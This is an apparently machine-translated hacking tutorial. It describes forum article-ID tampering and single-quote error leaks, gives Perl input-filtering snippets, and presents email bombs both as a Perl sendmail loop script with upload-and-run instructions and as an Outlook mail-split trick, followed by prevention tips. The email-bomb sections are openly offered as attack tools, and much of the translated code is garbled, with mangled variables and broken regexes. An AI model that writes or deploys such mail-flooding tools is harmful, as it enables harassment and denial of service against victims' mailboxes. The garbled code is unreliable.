The simplest attack and prevention methods

Source: Legion 8

The attack method described in this section is to pave the way for the next section. When learning, readers should learn more about Perl and websites. If possible, it is best to install a set of website service programs in your system, and then find some free Perl code for debugging and research.

I. Free attack forums:
The attack described here is very simple. It achieves the effect of obtaining the password of the forum administrator and having the permission to modify the Forum. Therefore, steps such as vulnerability scanning and removal are not designed. First, let's introduce the origin of the problem: many websites on the Internet Provide forum or e-message versions. Most of these services are compiled using asp, php, cgi, or perl, hackers can also obtain these free forum code. Therefore, after analysis, they can find "defects in free software" and then attack the forums on the website.
For example, the article Management System of http://www.ls1238.com/website has a very serious problem (I have already contacted them to describe this vulnerability and the related vulnerability has been fixed). Let's see how it is accessed through a browser. When we read the article, the URL address is/list. asp? Articleid = nnnn, apparently list. asp is the program that displays the article, and what is next? Articleid = nnnn is its parameter, and nnnn is the document number. When a hacker applies to become a member of the tougao website, he has the right to upload, modify, and delete his/her own articles. How can he modify an article using editarticleself. asp? Articleid = nnnn. The nnnn should be your own article code, but what if the hacker changes the article code?
After modifying the article code, you can modify other articles! That is to say, any user who has registered as a tougao website for free can have the right to modify any article and use delarticleself. asp to delete any article!
I have already described an attack. Is it very simple? In fact, problems like this can be seen everywhere on the Internet. Please think about it. What if you want to modify the nnnn, for example, enter a few English letters or punctuation marks? After an attempt, it is found that if the numeric value is "single quotes", the system will report an error and sensitive information such as the database file name and disk physical path, in this way, you can directly download the database to your local device and find the administrator account.
In early versions of YukiBBS3000, when the registrant's registration information contains single quotes, a "program running error" prompt will also appear, and cause internal data errors in the Forum, permanently terminate the normal operation of the Forum.

Ii. Attack prevention:
Relatively speaking, large portal websites such as Netease And Sina are doing better in this regard. They have made judgments on the Article ID to prevent special characters from being involved. If users enter illegal characters, after detection, the system prompts that the entered ID number is invalid and rejects the request. A "invalid input character" interface is returned.
In addition, they are considerate about modifying the article. During every article modification, the system will detect the user's identity and determine whether the article to be modified belongs to the login identity, if not, a warning is given. In fact, this problem also exists on their websites in the early days, but because the Administrator has a strong awareness of network security, even if the vulnerability is discovered and repaired.
When designing programs such as cgi and perl, you must consider various possible situations, such as submitting file names carefully, A special name that is not considered by a program may cause serious consequences to the system. If you enter a file name, you may try to open a dangerous string! For example, the file name entered by the user contains path characters, such as Directory slashes and vertices! All you can expect is to enter the public file name (for example, report.txt), but the result may be/report.txt or.../report.txt. All the files in the system may be leaked, and the consequences can be imagined.
To design cgi and perl programs, it is best to add the following very character detection code to the Code:
If ($ file_name = ~ /[^ A-zA-Z _.]/) | ($ file_name = ~ /^ ./))
{# File package contains invalid characters}
In addition, you should also pay attention to the judgment of greater than or less than signs, because these two symbols are attribute symbols in html documents. blocking them will cause serious consequences to the Forum, isn't there a lot of "pediatrics" chat rooms playing tricks on the Internet? In a simple way, the appearance of minor signs and major signs is not allowed, because all HTML syntaxes must be included between these two characters. If the program detects them, an error message is returned, the following line of Perl code quickly clears the two characters:
$ User_input = ~ S/<> // g;
Of course, there is also a better choice, that is, to convert these two characters into their HTML for code (special code), used to represent each character without using the character itself. The following code uses <replace less than symbol,> replace more than symbol to complete the conversion process:
$ User_input = ~ S/</g;
$ User_input = ~ S/>/& gt;/g;

3. Compile a simple email bomb:
Using Perl programs, you can quickly Write email bomb programs. This method is much better than directly using other people's email bombs. At least the learners can really "understand" What is a hacker. The compilation environment for this bomb is a network server with CGI permissions, and the sendmail command is provided on this server (of course, this can be set on your own system ), we also need to learn more about the perl language.
The principle of the program is very simple, that is, the sendmail command is used to repeatedly send emails with the same content to the target. To control the number of emails sent, we declare a counter variable and use the while () the function performs a loop. Let's take a look at the source code of the program:

#! /Bin/perl
$ File =/user/lib/sendmail;
$ Target = someone@target.com;
$ Count = 0;
While ($ count & lt; 1000 ){
Open (MAIL, "/$ file $ target") | die "Can not open $ file!
Print MAIL "Haha, you are under attack"
Close (MAIL );
Sleep 3;
$ Count ++;
}

Do you understand? The program is just like this, isn't it very simple? Because Perl is an interpreted language, you do not need to compile it. Instead, you can directly upload the source code to the server and set it to 755 or 775. Then, you can directly use it through a browser. The $ file and $ target variables in the program define the sendmail command path and target address respectively. before using this program, you must modify the address as needed, the $ count variable is the number of bomb mails we want to send. Because the sending of mail is completed by the server, the speed is very fast. This quantity can be set to a larger value, we don't feel the program is slow.

4. Use Outlook to create an email bomb:
Compared with the previous method, this method is more direct. Instead of using a dedicated tool, you only need to use the Outlook Email client software. First, we will introduce the basic principles of email bombs: email bombs are generally divided into two types. One is to cause the recipient's email server space to overflow by sending a large amount of spam, resulting in an unacceptable email; another method is to endlessly send small emails with the same content, so that the recipient cannot receive them and give up his email. Therefore, as long as one of them is implemented, it can be called "email bomb ".
Using Outlook to create an email bomb is to use the second method mentioned above to continuously send emails to a specified target. First, we need to make some preparations: Apply for a free email box, set the mailbox account to Outlook, select "Tools"> "accounts" in the Outlook tool menu, and select the email account you just applied, click "properties" on the right of the window. In the displayed Properties window, click the "advanced" tab above the window to change the "mail split size" attribute value in the "send" setting, this value should be smaller as possible (it is recommended to change to 16) and exit.
In this way, as long as the configured email box is used to send emails, as long as the email size exceeds the specified number of bytes, Outlook will automatically split the email, for example, if a 100 kb email is split into 16 KB and sent to the recipient, more than emails will appear in the recipient's mailbox, and the email bomb function will be implemented!

5. How to Prevent email bombs:
Emails can be prevented from multiple aspects, such as preparing for a rainy day, using email boxes with caution from the beginning, or restoring email boxes as soon as possible on the Internet, most articles about email bomb prevention talk about Linux and other systems, but not many of them actually involve beginner users. However, most people actually use Windows systems, even if the pop3 server is a Linux system, no one can receive emails using traditional command methods. Here we will describe a method closely related to readers to Prevent email bombs.
1. Do not disclose the mailbox address and prepare multiple mailboxes:
It is the best way to prepare early and prevent hackers from knowing their email addresses. This requires users to disclose their email addresses as few as possible on the Internet, do not leave the address to a person you do not know or to an e-forum. Of course, if you can, users can apply for several more email boxes, and contact different people in different mailboxes to prepare a public email box. Once attacked, it will not cause too much loss.
2. Use software to quickly clear bomb Emails:
Using bomb cleaner software such as BombCleaner, you can view the mail list when you do not accept the mail, and select junk mail for remote deletion, which can save a lot of time to download the mail, at the same time, the virus is blocked by email. However, this method has its most obvious defect: Once the mailbox has been filled with emails, it will be too late to delete the above emails, and the important emails sent by the emails will not be able to be received.
3. Set mailbox Filtering:
Mailbox filtering can solve problems that cannot be solved by the above software. The filter can be set in the local email client program or directly in the pop3 mailbox through a browser. The former is similar to the exploitation software described above, it is also used to determine whether the email is spam or bomb when receiving emails, so it does not have any effect when the mailbox is full.
However, if you can set your mailbox filter on the pop3 server, you can fundamentally avoid the possibility of being attacked. The specific method is as follows: log on to the pop3 server through a browser, enter your mailbox, and find "email sending and receiving Settings ", enter the email address for sending spam in the filter (multiple addresses can be separated by semicolons), and confirm the saving, in this way, you can filter out bomb emails on the server to ensure the security of your email box.
4. Set the size of the received email:
What if the hacker sent not hundreds of small letters but a MB bomb? This type of email is not required. You can fill your email box with one email. Therefore, when setting "filter", pay attention to the "receive mail size" option, we recommend that you set this value to around 1/3 of the email box. For example, if the user's email address is 30 mb, you can set the size of each email address to be received to a maximum of 10 MB. If the size of each email address exceeds this value, the email address will be confirmed.